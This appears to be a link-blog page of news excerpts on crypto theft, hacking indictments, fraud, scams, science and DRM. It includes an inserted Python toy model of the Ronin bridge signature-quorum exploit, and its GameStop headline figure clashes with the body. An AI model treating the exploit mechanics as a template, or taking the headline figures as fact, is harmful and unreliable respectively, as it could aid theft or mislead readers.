The Linkielist

Linking ideas with the world


Copyright Is Indispensable For Artists, They Say; But For All Artists, Or Just Certain Kinds?

One of the central “justifications” for copyright is that it is indispensable if creativity is to be viable. Without it, we are assured, artists would starve. This ignores the fact that artists created and thrived for thousands of years before the 1710 Statute of Anne. But leaving that historical detail aside, as well as the larger question of the claimed indispensability of copyright, a separate issue is whether copyright is a good fit for all creativity, or whether it has inherent biases that few like to talk about.

One person who does talk about them is Kevin J. Greene, John J. Schumacher Chair Professor of Law at Southwestern Law School in Los Angeles. In his 2008 paper “‘Copynorms,’ Black Cultural Production, and the Debate Over African-American Reparations” he writes:

To paraphrase Pink Floyd, there’s a dark sarcasm in the stance of the entertainment industry regarding “copynorms” [respect for copyright]. Indeed, the “copynorms” rhetoric the entertainment industry espouses shows particular irony in light of its long history of piracy of the works of African-American artists, such as blues artists and composers.

In another analysis, Greene points out that several aspects of copyright are a poor fit for the way many artists create. For example:

The [US] Copyright Act requires that “a work of authorship must be “fixed in any tangible medium of expression, now known or later developed, from which [it] can be perceived, reproduced, or otherwise communicated, either directly or indirectly with the aid of a machine or device.” Although “race-neutral”, the fixation requirement has not served the ways Black artists create: “a key component of black cultural production is improvisation.” As a result, fixation deeply disadvantages African-American modes of cultural production, which are derived from an oral tradition and communal standards.

The same is true for much creativity outside the Western nations that invented the idea of copyright and then proceeded to impose its norms on other nations, not least through trade agreements. Greene’s observation suggests that copyright is far from universally applicable, and may just be a reflection of certain cultural and historical biases. When people talk airily about how copyright is needed to support artists, it is important to ask them to specify which artists, and then to examine whether copyright really is such a good fit for their particular kind of creativity.

Source: Copyright Is Indispensable For Artists, They Say; But For All Artists, Or Just Certain Kinds? | Techdirt

Pokémon-Like NFT Game Axie Infinity Scammed Out Of $600 Million

Pokémon-style NFT battler Axie Infinity was one of the biggest “success” stories in the world of crypto gaming. Now it’s responsible for one of the biggest thefts in the history of the technology. The gaming-focused blockchain Ronin Network announced earlier today that an Axie Infinity exploit allowed a hacker to “drain” roughly $600 million worth of cryptocurrency from the network.

“There has been a security breach on the Ronin Network,” the company announced on its Substack. “Earlier today, we discovered that on March 23rd, Sky Mavis’s Ronin validator nodes and Axie DAO validator nodes were compromised resulting in 173,600 Ethereum and 25.5M USDC drained from the Ronin bridge in two transactions.”

The person responsible allegedly used hacked private keys to order the fraudulent withdrawals. How, you ask? According to Ronin, “the attacker found a backdoor through our gas-free RPC node, which they abused to get the signature for the Axie DAO validator.”

Basically, the Ronin side-chain used by games like Axie Infinity relies on nine validator nodes, whose signatures are what authorise a withdrawal, to prevent fraudulent transactions. However, in November 2021, due to overwhelming demand from new Axie players, the Axie DAO allowlisted Sky Mavis, the company behind the game, so that Sky Mavis could sign transactions on the DAO’s behalf. That arrangement ended in December, but the allowlist entry was never revoked, so compromising Sky Mavis alone was enough to obtain the DAO validator’s signature as well.

[…]

“The Axie DAO allowlisted Sky Mavis to sign various transactions on its behalf,” Ronin writes. “This was discontinued in December 2021, but the allowlist access was not revoked. Once the attacker got access to Sky Mavis systems they were able to get the signature from the Axie DAO validator by using the gas-free RPC.”
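To make the failure mode concrete, here is an added example (not Ronin or Sky Mavis code) modelling a bridge whose withdrawals need a quorum of validator signatures, plus one validator that allowlists a delegate to request signatures over an RPC endpoint. The quorum of five and the split of four Sky Mavis-run validators are assumptions for this example; the page states only that there were nine validators. HMAC-SHA256 over constructed keys stands in for real validator signatures.

```python
"""Toy model of a bridge whose withdrawals need a quorum of validator signatures,
with one validator that allowlists another party to request signatures via an
RPC endpoint. Added example, not Ronin or Sky Mavis code."""
import hashlib
import hmac
from dataclasses import dataclass, field

THRESHOLD = 5  # ASSUMPTION: quorum of 5 of the 9 validators; the page gives only the count of 9


def _sign(key: bytes, withdrawal: bytes) -> str:
    """Stand-in for a validator's signature (HMAC-SHA256 in this toy model)."""
    return hmac.new(key, withdrawal, hashlib.sha256).hexdigest()


@dataclass
class ValidatorNode:
    name: str
    key: bytes                                   # constructed secret, not a real key
    allowlist: set = field(default_factory=set)  # requesters this node signs for

    def sign(self, withdrawal: bytes) -> str:
        return _sign(self.key, withdrawal)

    def rpc_sign(self, requester: str, withdrawal: bytes) -> str:
        """Gas-free RPC as modelled here: an allowlisted requester gets a
        signature with no independent check of what is being withdrawn."""
        if requester not in self.allowlist:
            raise PermissionError(f"{requester} is not allowlisted on {self.name}")
        return self.sign(withdrawal)


@dataclass
class Bridge:
    nodes: list
    threshold: int

    def verify_withdrawal(self, withdrawal: bytes, signatures: dict) -> tuple:
        """Return (approved, names of validators whose signature verified).
        A signature counts only if it verifies under that validator's own key."""
        approving = [
            n.name for n in self.nodes
            if n.name in signatures
            and hmac.compare_digest(signatures[n.name], n.sign(withdrawal))
        ]
        return len(approving) >= self.threshold, approving


def build_network() -> tuple:
    """Nine validators: four run by Sky Mavis (ASSUMED split), the Axie DAO's,
    and four others. Keys are constructed from the names for reproducibility."""
    names = ([f"sky-mavis-{i}" for i in range(1, 5)] + ["axie-dao"]
             + [f"partner-{i}" for i in range(1, 5)])
    nodes = {n: ValidatorNode(n, hashlib.sha256(f"key:{n}".encode()).digest()) for n in names}
    return nodes, Bridge(list(nodes.values()), THRESHOLD)


def run_scenario(revoked: bool) -> tuple:
    """Attacker holds Sky Mavis's four validator keys and can reach the DAO
    validator's RPC as Sky Mavis. Returns (withdrawal approved?, signature count)."""
    nodes, bridge = build_network()
    nodes["axie-dao"].allowlist.add("sky-mavis")          # November 2021 delegation
    if revoked:
        nodes["axie-dao"].allowlist.discard("sky-mavis")  # what should have happened in December 2021
    withdrawal = b"withdraw 173600 ETH + 25.5M USDC to attacker"  # constructed message
    sigs = {n: nodes[n].sign(withdrawal) for n in nodes if n.startswith("sky-mavis-")}
    try:
        sigs["axie-dao"] = nodes["axie-dao"].rpc_sign("sky-mavis", withdrawal)
    except PermissionError:
        pass  # stale entry gone: the attacker is stuck at four signatures
    approved, approving = bridge.verify_withdrawal(withdrawal, sigs)
    return approved, len(approving)


if __name__ == "__main__":
    print("allowlist left in place:", run_scenario(revoked=False))  # (True, 5)
    print("allowlist revoked:      ", run_scenario(revoked=True))   # (False, 4)
```

With the allowlist left in place, the attacker’s four stolen keys plus the auto-signed DAO signature reach quorum; revoke the entry and the same attacker is stuck at four. The operational lesson is that an allowlist entry is a credential: it needs an expiry or a revocation step tied to the end of the arrangement it served, and a signing endpoint should validate the withdrawal it is asked to sign rather than trusting the requester.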

Ronin has apparently locked down accounts while it continues its investigation into the hack, meaning no one can get their funds out even as the price of RON, the network’s native token, has reportedly plummeted more than 25%.

[…]

Source: Pokémon-Like NFT Game Axie Infinity Scammed Out Of $600 Million

GameStop, AMC Stocks Halted On NYSE after reaching above $500 per share

GameStop (GME) shares extended declines Tuesday, after being halted by officials on the New York Stock Exchange, in a move that could snap the meme stock’s longest winning streak in more than a decade.

Both GameStop and AMC Entertainment (AMC), the names that defined last year’s meme-stock phenomenon, were halted in early Tuesday trading amid heightened volatility and larger-than-usual pre-market volumes.

GameStop was last seen trading 6.1% lower on the session at $178.00 each, a move that would still leave the stock up 41% over the past month, while AMC fell as much as 12% before trading 2.1% into the red at $28.80 each.

Securities and Exchange Commission filings late Tuesday last week showed that GameStop chairman Ryan Cohen’s RC Ventures LLC, which has also built a stake in Bed Bath & Beyond (BBBY), now owns around 9.1 million GameStop shares, representing an 11.9% overall stake in the Grapevine, Texas-based group.

Short interest in the shares remains elevated, however, with data from S3 Partners showing just under $1.2 billion in bets against the group, a figure that represents around 12.66 million shares, or 20.1% of the stock’s outstanding float.

GameStop reported a wider-than-expected loss of $1.86 per share for its fiscal fourth quarter last week, and managed to record negative free cash flow of $131.6 million even as revenues rose 6.2% to $2.25 billion.

Source: GameStop Stock Halted On NYSE, Extends Slide As Trading Resumes – TheStreet

Oddly enough this article talks it down but a quick look at the chart shows astronomic growth on both stocks. Superstonk is going nuts on Reddit.


New method for making tissue transparent could speed the study of many diseases

Scientists at Scripps Research have unveiled a new tissue-clearing method for rendering large biological samples transparent. The method makes it easier than ever for scientists to visualize and study healthy and disease-related biological processes occurring across multiple organ systems.

Described in a paper in Nature Methods on March 28, 2022, and dubbed HYBRiD, the new method combines elements of the two main prior approaches to tissue-clearing technology, and should be more practical and scalable than either for large-sample applications.

[…]

Tissue-clearing involves the use of solvents to remove molecules that make tissue opaque (such as fat), rendering the tissue optically transparent—while keeping most proteins and structures in place. Scientists commonly use genetically encoded or antibody-linked fluorescent beacons to mark active genes or other molecules of interest in a lab animal, and tissue-clearing in principle allows these beacons to be imaged all at once across the entire animal.

[…]

 

Video: Learn how a new Scripps Research technique makes it easier to analyze body-wide biological processes and diseases such as COVID-19 infection. Credit: Scripps Research

The new method devised by Ye and his team uses a sequential combination of organic solvents and water-based detergents, and makes use of water-based hydrogels to protect those molecules within the tissue that need to be preserved. It often does not require the pumping of solvents through the sample.

“In many cases, you can just put the whole thing in a jar and keep it in a shaker on your benchtop until it’s done,” says co-first author Victoria Nudell, a research assistant in the Ye lab. “This makes it practical and scalable enough for routine use.”

The researchers demonstrated the ease and utility of their new method in a variety of applications. These included a collaboration with the laboratory of John Teijaro, Ph.D., associate professor of immunology and microbiology, to image SARS-CoV-2-infected cells in the whole chests of mice for the first time—a procedure whose simplicity, with the new method, enabled it to be done in a high-level biosafety facility where access to equipment is strictly limited.

[…]

Source: New method for making tissue transparent could speed the study of many diseases

Global science project links Android phones with satellites to improve weather forecasts

Collecting satellite data for research is a group effort thanks to this app developed for Android users. Camaliot is a campaign funded by the European Space Agency, and its first project focuses on making smartphone owners around the world part of a project that can help improve weather forecasts by using your phone’s GPS receiver.

The Camaliot app works on devices running Android version 7.0 or later that support satellite navigation.

[…]

Researchers think that they can use satellite signals to get more information about the atmosphere. For example, the amount of water vapor in the atmosphere can affect how a satellite signal travels through the air to something like a phone.

The app gathers information to track signal strength, the distance between the satellite and the phone being used, and the satellite’s carrier phase, according to Camaliot’s FAQs. With enough data collected from around the world, researchers can theoretically combine that with existing weather readings to measure long-term water vapor trends. They hope to use that data to inform weather forecasting models with machine learning. They can also track changes in Earth’s ionosphere — the part of the atmosphere near space. Creating better ionospheric forecasts could be relevant in tracking space weather and could eventually make Global Navigation Satellite Systems (GNSS) more accurate by accounting for events like geomagnetic storms.

[…]

Here’s how you can begin using the Camaliot app on your Android phone after downloading it from Google Play:

  1. Select “start logging” and place your phone in an area with a clear sky view to begin logging the data
  2. Once you have measured to your liking, select “stop logging”
  3. Then, upload your session to the server and repeat the process over time to collect more data. You can also delete your locally-stored log files at this step.

In addition to being able to view your own measurements against others accumulated over time, you can also see a leaderboard showing logging sessions done by other participants. Eventually, the information collected for the study will be available in a separate portal.

For registered users, their password, username, email address, and number of measurements will be stored in Camaliot’s database, but they won’t be used in post-study publications and products, according to Camaliot’s privacy policy. Specifically, Camaliot says that the need for extensive personal data is for scientific purposes and environmental monitoring and that its need for processing data is “necessary for the performance of a task carried out in the public interest, namely for the conduction of this scientific study.”

[…]

Source: Global science project links Android phones with satellites to improve weather forecasts – The Verge

Unprecedented videos show RNA switching ‘on’ and ‘off’

Similar to a light switch, RNA switches (called riboswitches) determine which genes turn “on” and “off.” Although this may seem like a simple process, the inner workings of these switches have confounded biologists for decades.

Now researchers led by Northwestern University and the University at Albany have discovered that one part of an RNA molecule smoothly invades and displaces another part of the same RNA, enabling the structure to rapidly and dramatically change shape. Called “strand displacement,” this mechanism appears to switch genetic expression from “on” to “off.”

Using a simulation they launched last year, the researchers made this discovery by watching a slow-motion simulation of a riboswitch up close and in action. Affectionately called R2D2 (short for “reconstructing RNA dynamics from data”), the new simulation models RNA in three dimensions as it binds to a compound, communicates along its length and folds to turn a gene “on” or “off.”

[…]

“We have found this strand displacement mechanism occurring in other types of RNA molecules, indicating this might be a potential generality of RNA folding,” said Northwestern’s Julius B. Lucks, who co-led the study. “We are starting to find similarities among different types of RNA molecules, which could eventually lead to RNA design rules for folding and function.”

[…]

Although RNA folding takes place in the human body more than 10 quadrillion times per second—every time a gene is expressed in a cell—researchers know very little about the process. To help visualize and understand this mysterious yet crucial process, Lucks and Chen unveiled R2D2 last year, in a paper published in the journal Molecular Cell.

Credit: Northwestern University

Employing a technique developed in Lucks’ lab, R2D2 captures data related to RNA folding as the RNA is being made. Then, it uses computational tools to mine and organize the data, revealing points where the RNA folds and what happens after it folds. Angela Yu, a former student of Lucks, inputted this data into computer models to generate accurate videos of the folding process.

“What’s so groundbreaking about the R2D2 approach…is that it combines experimental data on RNA folding at the nucleotide level with predictive algorithms at the atomic level to simulate RNA folding in ultra-slow motion,” said Dr. Francis Collins, director of the National Institutes of Health, in his February 2021 blog. “While other computer simulations have been available for decades, they have lacked much-needed experimental data of this complex folding process to confirm their mathematical modeling.”

[…]

Source: Unprecedented videos show RNA switching ‘on’ and ‘off’

Chemists cook up way to remove microplastics using okra

Extracts of okra and other slimy plants commonly used in cooking can help remove dangerous microplastics from wastewater, scientists said Tuesday.

The new research was presented at the spring meeting of the American Chemical Society, and offers an alternative to the synthetic chemicals currently used in treatment plants, which can themselves pose risks to health.

“In order to go ahead and remove microplastic or any other type of materials, we should be using materials which are non-toxic,” lead investigator Rajani Srinivasan, of Tarleton State University, said in an explainer video.

[…]

Srinivasan’s past research had examined how the goo from okra and other plants could remove textile-based pollutants from water and even microorganisms, and she wanted to see if that would equally apply to microplastics.

[…]

Typical wastewater treatment removes microplastics in two steps.

First, those that float are skimmed off the top of the water. These however account for only a small fraction, and the rest are removed using flocculants, or sticky chemicals that attract microplastics into larger clumps.

The clumps sink to the bottom and can then be separated from the water.

The problem is that these synthetic flocculants, such as polyacrylamide, can break down into toxic chemicals.

[…]

They tested chains of carbohydrates, known as polysaccharides, from the individual plants, as well as in combination, on various microplastic-contaminated water samples, examining before-and-after microscopic images to determine how many particles had been removed.

They found that polysaccharides from okra paired with those from fenugreek could best remove microplastics from seawater, while polysaccharides from okra paired with tamarind worked best in freshwater samples.

Overall, the plant-based polysaccharides worked just as well or better than polyacrylamide. Crucially, the plant-based chemicals are both non-toxic and can be used in existing treatment plants.

[…]

Source: Chemists cook up way to remove microplastics using okra

Finally, A Mapping Tool For Addressable LED Strings

Addressable LED strings have made it easier than ever to build fun glowable projects with all kinds of exciting animations. However, if you’re not going with a simple grid layout, it can be a little difficult to map your strings out in code. Fear not, for [Jason Coon] has provided a tool to help out with just that!

[Jason]’s web app, accessible here, is used for mapping out irregular layouts when working with addressable LED strings like the WS2812B and others that work with libraries like FastLED and Pixelblaze. If you’re making some kind of LED globe, crazy LED tree, or other non-gridular shape, this tool can help.

The first step is to create a layout of your LEDs in a Google Sheets table, which can then be pasted into the web app. Then, the app handles generating the necessary code to address the LEDs in an order corresponding to the physical layout.

[Jason] does a great job of explaining how the tool works, and demonstrates it working with a bowtie-like serpentine layout with rainbow animations. The tool can even provide visual previews of the layout so you can verify what you’ve typed in makes sense.
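As an added example (not [Jason]’s tool), the same idea in a few lines of Python: parse a layout typed into a spreadsheet, where each cell holds the strip index of the LED at that physical position or a dash where there is none, check it for gaps and duplicated indices, and emit a lookup table from strip index to (x, y). The serpentine helper, the sample layouts and the C array format are assumptions for illustration; FastLED’s own XY helpers and the web app’s output differ.

```python
"""Added example (not Jason Coon's tool): build an LED index -> (x, y) map from a
pasted spreadsheet-style layout and emit a FastLED-style lookup table."""


def serpentine_index(x: int, y: int, width: int) -> int:
    """Strip index of pixel (x, y) on a grid wired in a serpentine (boustrophedon)
    pattern: even rows run left-to-right, odd rows right-to-left."""
    return y * width + (x if y % 2 == 0 else width - 1 - x)


def parse_layout(table: str, blank: str = "-") -> dict:
    """Parse a whitespace-separated table in which each cell holds the strip index
    of the LED at that position, or `blank` where there is no LED.
    Returns {index: (x, y)}; raises on a duplicated index."""
    coords = {}
    for y, row in enumerate(table.strip().splitlines()):
        for x, cell in enumerate(row.split()):
            if cell == blank:
                continue
            idx = int(cell)
            if idx in coords:
                raise ValueError(f"LED {idx} appears at both {coords[idx]} and {(x, y)}")
            coords[idx] = (x, y)
    return coords


def missing_indices(coords: dict) -> list:
    """Strip positions with no entry in the table (a wiring or typing mistake)."""
    return [i for i in range(max(coords) + 1) if i not in coords]


def to_c_table(coords: dict, name: str = "XYTable") -> str:
    """Emit a C array, indexed by strip position, of {x, y} pairs, the kind of
    table a FastLED sketch can index with the LED number. Assumed output format."""
    gaps = missing_indices(coords)
    if gaps:
        raise ValueError(f"layout has gaps: {gaps}")
    rows = ",\n".join(f"  {{{x}, {y}}}" for _, (x, y) in sorted(coords.items()))
    return f"const uint8_t {name}[{len(coords)}][2] = {{\n{rows}\n}};"


# Constructed 4x3 serpentine layout, as it would be typed into the spreadsheet.
SERPENTINE_4X3 = """
0 1 2 3
7 6 5 4
8 9 10 11
"""

# Constructed bow-tie-like layout with blank cells.
BOWTIE = """
0 - - 5
- 1 4 -
- 2 3 -
"""

if __name__ == "__main__":
    print(to_c_table(parse_layout(BOWTIE)))
```

The gap and duplicate checks are the part worth keeping even if you use the web app: an index typed twice or skipped silently maps two LEDs to one cell or leaves one dark, which is hard to spot on a large irregular build.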

It’s a great tool that we recently saw put to use on [Geeky Faye’s] excellent necklace project. Video after the break.

 

 

 


Source: Finally, A Mapping Tool For Addressable LED Strings | Hackaday

NeRF Research Turns a few dozen 2D Photos Into 3D Scenes really quickly

[…] Known as inverse rendering, the process uses AI to approximate how light behaves in the real world, enabling researchers to reconstruct a 3D scene from a handful of 2D images taken at different angles. The NVIDIA Research team has developed an approach that accomplishes this task almost instantly — making it one of the first models of its kind to combine ultra-fast neural network training and rapid rendering.

NVIDIA applied this approach to a popular new technology called neural radiance fields, or NeRF.

[…]

“If traditional 3D representations like polygonal meshes are akin to vector images, NeRFs are like bitmap images: they densely capture the way light radiates from an object or within a scene,”

[…]

Showcased in a session at NVIDIA GTC this week, Instant NeRF could be used to create avatars or scenes for virtual worlds, to capture video conference participants and their environments in 3D, or to reconstruct scenes for 3D digital maps.

[…]

Collecting data to feed a NeRF is a bit like being a red carpet photographer trying to capture a celebrity’s outfit from every angle — the neural network requires a few dozen images taken from multiple positions around the scene, as well as the camera position of each of those shots.

[…]

Instant NeRF, however, cuts rendering time by several orders of magnitude. It relies on a technique developed by NVIDIA called multi-resolution hash grid encoding, which is optimized to run efficiently on NVIDIA GPUs. Using a new input encoding method, researchers can achieve high-quality results using a tiny neural network that runs rapidly.

The model was developed using the NVIDIA CUDA Toolkit and the Tiny CUDA Neural Networks library. Since it’s a lightweight neural network, it can be trained and run on a single NVIDIA GPU — running fastest on cards with NVIDIA Tensor Cores.

The technology could be used to train robots and self-driving cars to understand the size and shape of real-world objects by capturing 2D images or video footage of them. It could also be used in architecture and entertainment to rapidly generate digital representations of real environments that creators can modify and build on.

[…]

Source: NeRF Research Turns 2D Photos Into 3D Scenes | NVIDIA Blog

Justice Department indicts four Russian government workers in energy sector hacks

The US Justice Department today announced indictments against four Russian government employees, who it alleges attempted a hacking campaign of the global energy sector that spanned six years and devices in roughly 135 countries. The two indictments were filed under seal last summer, and are finally being disclosed to the public.

The DOJ’s decision to release the documents may be a way to raise public awareness of the increased threat these kinds of hacks pose to US critical infrastructure in the wake of Russia’s invasion of Ukraine. State-sponsored hackers have targeted energy, nuclear, water and critical manufacturing companies for years, aiming to steal information on their control systems. Cybersecurity officials noticed a spike in Russian hacking activity in the US in recent weeks.

“Russian state-sponsored hackers pose a serious and persistent threat to critical infrastructure both in the United States and around the world,” said Deputy Attorney General Lisa O. Monaco in a statement. “Although the criminal charges unsealed today reflect past activity, they make crystal clear the urgent ongoing need for American businesses to harden their defenses and remain vigilant.

The indictments allege that two separate campaigns occurred between 2012 and 2018. The first one, filed in June 2021, involves Evgeny Viktorovich Gladkikh, a computer programmer at the Russian Ministry of Defense. It alleges that Gladkikh and a team of co-conspirators were members of the Triton malware hacking group, which in 2017 attacked the safety systems of a Saudi petrochemical plant. The attack could have caused an explosion; as TechCrunch noted, the plant was spared only because a bug in the malware’s code caused the safety controllers to fail safe and shut the plant down instead. In 2018, the same group attempted to hack US power plants but failed.

The second indictment charges three hackers who work for Russia’s intelligence agency, the Federal Security Service (FSB), as being the members of the hacking group Dragonfly, which coordinated multiple attacks on nuclear power plants, energy companies, and other critical infrastructure. It alleges that the three men, Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov engaged in multiple computer intrusions between 2012 and 2017. The DOJ estimates that the three hackers were able to install malware on more than 17,000 unique devices in the US and abroad.

A second phase known as Dragonfly 2.0, which occurred between 2014 and 2017, targeted more than 3,300 users across 500 different energy companies in the US and abroad. According to the DOJ, the conspirators were looking to access the software and hardware in power plants that would allow the Russian government to trigger a shutdown.

The US government is still looking for the three FSB hackers. The State Department today announced a $10 million award for any information on their whereabouts. However, as the Washington Post notes, the US and Russia do not have an extradition treaty, so the likelihood of any of the alleged hackers being brought to trial by these indictments is slim.

Source: Justice Department indicts four Russian government workers in energy sector hacks | Engadget

Scientists find microplastics in blood for first time

Scientists have discovered microplastics in human blood for the first time, warning that the ubiquitous particles could also be making their way into organs.

The tiny pieces of mostly invisible plastic have already been found almost everywhere else on Earth, from the deepest oceans to the highest mountains as well as in the air, soil and food chain.

A Dutch study published in the Environment International journal on Thursday examined blood samples from 22 anonymous, healthy volunteers and found microplastics in nearly 80 percent of them.

Half of the blood samples showed traces of PET plastic, widely used to make drink bottles, while more than a third had polystyrene, used for disposable food containers and many other products.

[…]

“Where is it going in your body? Can it be eliminated? Excreted? Or is it retained in certain organs, accumulating maybe, or is it even able to pass the blood-brain barrier?”

The study said the microplastics could have entered the body by many routes: via air, water or food, but also in products such as particular toothpastes, lip glosses and tattoo ink.

[…]

 

Source: Scientists find microplastics in blood for first time

HP staffer blew $5m on personal expenses with company card

A now-former HP finance planning manager pleaded guilty on Wednesday to charges of wire fraud, money laundering, and filing false tax returns that follow from the misappropriation of company funds.

According to the US Justice Department, Shelbee Szeto, 30, of Fremont, California, worked at HP Inc from August 2017 through June 2021, first as an executive assistant and then as a finance planning manager.

During that time, she was responsible for paying HP vendors

[…]

Szeto was issued multiple PCards and, according to prosecutors, she devised a scheme to make purported vendor payments to financial accounts that she controlled and then used HP’s funds to purchase goods for herself.

“Between approximately April 24, 2018 and April 23, 2021, Szeto knowingly charged approximately $4.8 million dollars in payments from her HP PCards to PayPal, Square, and Stripe merchant accounts under her control and for her personal benefit,” the indictment stated.

To make this spending appear legitimate, Szeto submitted false invoices to HP.

[…]

Szeto managed to make several transactions in the $30,000 to $40,000 range; Square declined to process a payment for $330,000. Asked for supporting paperwork by the payment processor, she is said to have provided false documentation and to have falsely told Square investigators the funds were for marketing work related to a real-estate transaction.

Her bank, First Republic, also questioned the source of her funds, according to the indictment, and the IRS noticed that her 2019 and 2020 tax forms were inaccurate. All told, Szeto is said to have cost HP $5.2m.

The Justice Department said Szeto spent the funds on: a 2020 Tesla sedan; a 2021 Porsche SUV; various bags and purses from Chanel, Dior, Gucci, and Hermes; and an assortment of jewelry including necklaces, rings, pendants, and wristwatches from Audemars Piguet, Bulgari, Cartier, and Rolex.

[…]

Source: HP staffer blew $5m on personal expenses with company card • The Register

British cops arrest seven under-21s in Lapsus$ crime gang probe after they break into and dox the tech giants

British cops investigating a cyber-crime group have made a string of arrests.

Though City of London Police gave few details on Thursday, officers are said to be probing the notorious extortionware gang Lapsus$, and have detained and released seven people aged 16 to 21.

In a statement, the force said: “Seven people between the ages of 16 and 21 have been arrested in connection with an investigation into a hacking group. They have all been released under investigation. Our inquiries remain ongoing.”

Among them is a 16-year-old boy from Oxford who has been accused of being one of the crew’s leaders, the BBC reported. He cannot be identified for legal reasons.

[…]

Bloomberg first reported the boy’s alleged involvement with the extortion gang on Wednesday, and claims by security researchers that he was the crew’s mastermind. Lapsus$ is the devil-may-care team of miscreants that have broken into major firms including Microsoft, Samsung, Vodafone, and Okta.

It is said the boy netted about $14m in Bitcoin from his online life, and was lately doxxed – which means he had his personal info leaked online – after an apparent falling out with his business partners.

[…]

The cyber-crime ring rose to fame in recent months for its brash tactics and its propensity to brag about its exploits on Telegram. Its standard operating procedure is to infiltrate a big target’s network, steal sensitive internal data, make demands to prevent the public release of this material – and usually release some of it anyway.

[…]

In February, however, the criminals sneaked into Nvidia‘s networks and stole one terabyte of data including employee credentials and proprietary information, and dumped some of it online.

Days later Lapsus$ said it had raided Samsung and stole 190GB of internal files including some Galaxy device source code.

The criminal group followed that up by claiming it was responsible for a cybersecurity incident at gaming giant Ubisoft.

‘Motivated by theft and destruction’

Microsoft, in its days-late confirmation that Lapsus$, which the Windows giant calls DEV-0537, did indeed steal some of its source code, said the crime group seems to be “motivated by theft and destruction.”

[…]

 

Source: British cops arrest seven in Lapsus$ crime gang probe • The Register

Owners Of ‘Gran Turismo 7’ Locked Out Of Single Player Game When Online DRM Servers Go Down – when you don’t own the game you bought

When someone asks me what DRM is, my answer is very simple: it’s anti-piracy software that generally doesn’t stop pirates at all, and, instead, mostly only annoys legitimate buyers. Well, then why do software and video game companies use it at all? Couldn’t tell you. Businesses really want to annoy their own customers? Apparently, yes. Timothy, when you say this doesn’t really stop pirates, you’re exaggerating, right? No, not at all.

The worst of the examples of legit customers getting screwed by video game DRM involve when a game or product is bricked simply because a publisher or its DRM partner simply shuts down the servers that make the DRM work, on purpose or otherwise.

Gran Turismo 7 was recently released on the PlayStation and is already facing major headwinds due to the public’s absolute hate for all the microtransactions included in the game. On top of that, the entire game, including the single player content, was rendered unplayable because the DRM servers that require an online check to play the game crumbled during a maintenance window.

The scheduled server maintenance, timed around the release of the version 1.07 patch for the game, was initially planned to last just two hours starting at 6 am GMT (2 am Eastern) on Thursday morning. Six hours later, though, the official Gran Turismo Twitter account announced that “due to an issue found in Update 1.07, we will be extending the Server Maintenance period. We will notify everyone as soon as possible when this is likely to be completed. We apologize for this inconvenience and ask for your patience while we work to resolve the issue.”

“Inconvenience” in this case means not being able to play the game the customer purchased. Like, basically at all. Why the single player content in a console game of all things should require an online check-in is completely beyond me.

[…]

Source: Owners Of ‘Gran Turismo 7’ Locked Out Of Single Player Game When Online DRM Servers Go Down | Techdirt

EU, US strike preliminary deal to unlock transatlantic data flows – yup, the EU will let the US spy on its citizens freely again

Negotiators have been working on an agreement — which allows Europeans’ personal data to flow to the United States — since the EU’s top court struck down the Privacy Shield agreement in July 2020 because of fears that the data was not safe from access by American agencies once transferred across the Atlantic.

European Commission President Ursula von der Leyen’s comments Friday show both sides have reached a political breakthrough, coinciding with U.S. President Joe Biden’s visit to Brussels this week.

“I am pleased that we found an agreement in principle on a new framework for transatlantic data flows. This will enable predictable and trustworthy data flows between the EU and U.S., safeguarding privacy and civil liberties,” she said.

Biden said the framework would allow the EU “to once again authorize transatlantic data flows that help facilitate $7.1 trillion in economic relationships.”

Friday’s announcement will come as a relief to the hundreds of companies that had faced mounting legal uncertainty over how to shuttle everything from payroll information to social media post data to the U.S.

Officials on both sides of the Atlantic had been struggling to bridge an impasse over what it means to give Europeans’ effective legal redress against surveillance by U.S. authorities. Not all of those issues have been resolved, though von der Leyen’s comments Friday suggest technical solutions are within reach.

Despite the ripples of relief Friday’s announcement will send through the business community, any deal is likely to be challenged in the courts by privacy campaigners.

Source: EU, US strike preliminary deal to unlock transatlantic data flows – POLITICO

Virtual Kidnappers Are Scamming Parents Out of Millions of Dollars

[…]

cases have become so widespread that the bureau has a name for them: virtual kidnappings. “It’s a telephone extortion scheme,” says Arbuthnot, who heads up virtual-kidnapping investigations for the FBI out of Los Angeles. Because many of the crimes go unreported, the bureau doesn’t have a precise number on how widespread the scam is. But over the past few years, thousands of families like the Mendelsteins have experienced the same bizarre nightmare: a phone call, a screaming child, a demand for ransom money, and a kidnapping that — after painful minutes, hours, or even days — is revealed to be fake.

[…]

Valerie Sobel, a Beverly Hills resident who runs a charitable foundation, also received a call from a man who told her he had kidnapped her daughter. “We have your daughter’s finger,” he said. “Do you want the rest of her in a body bag?” As proof, the kidnapper said, he was putting her daughter on the phone. “Mom! Mom!” she heard her daughter cry. “Please help — I’m in big trouble!” Like Mendelstein, Sobel was told not to take any other calls. After getting the ransom money from her bank, she was directed to a MoneyGram facility, where she wired the cash to the kidnappers — only to discover that her daughter had never been abducted.

The cases weren’t just terrifying the victims; they were also rattling police officers, who found themselves scrambling to stop kidnappings that weren’t real. “They’re jumping fences, they’re breaking down doors to rescue people,” Arbuthnot tells me. The calls were so convincing that they even duped some in law enforcement.

[…]

I’m listening to a recording of a virtual kidnapping that Arbuthnot is playing for me, to demonstrate just how harrowing the calls can be. “It begins with the crying,” he says. “That’s what most people hear first: Help me, help me, help me, Mommy, Mommy, Daddy.”

Virtual kidnapping calls, like any other telemarketing pitch, are essentially a numbers game. “It’s literally cold-calling,” Arbuthnot tells me. “We’ll see 100 phone calls that are total failures, and then we’ll see a completely successful call. And all you need is one, right?”

The criminals start with a selected area code and then methodically work their way through the possible nine-digit combinations of local phone numbers. Not surprisingly, the first area where the police noticed a rash of calls was 310 — Beverly Hills. But it’s not enough to just get a potential mark to pick up. Virtual kidnapping is a form of hypnosis: The kidnappers need you to fall under their spell. In hacker parlance, they’re “social engineers,” dispassionately rewiring your reactions by psychologically manipulating you. That’s why they start with an emotional gut punch that’s almost impossible to ignore: a recording of a child crying for help.

The recordings are generic productions, designed to ensnare as many victims as possible. “They’re not that sophisticated,” Arbuthnot tells me. It’s a relatively simple process: The criminals get a young woman they know to pretend they’ve been kidnapped, and record their hysterical pleas. From there, the scheme follows one of two paths. Either you don’t have a kid, or suspect something is amiss, and hang up. Or, like many parents, you immediately panic at the sound of a terrified child.

Before you can form a rational thought, you blurt out your kid’s name, if only to make sense of what you’re hearing. Lisa? you say. Is that you? What’s wrong?

